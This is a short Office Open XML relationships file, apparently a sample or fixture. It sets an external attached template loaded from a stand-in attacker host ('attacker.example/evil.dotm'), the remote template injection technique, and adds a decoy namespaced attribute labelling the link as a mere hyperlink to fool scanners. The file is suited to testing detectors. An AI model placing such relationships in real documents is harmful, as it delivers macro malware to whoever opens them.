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<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships" xmlns:x="urn:example:x"><Relationship Id="rId1" x:Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://attacker.example/evil.dotm" TargetMode="External"/></Relationships>
</file>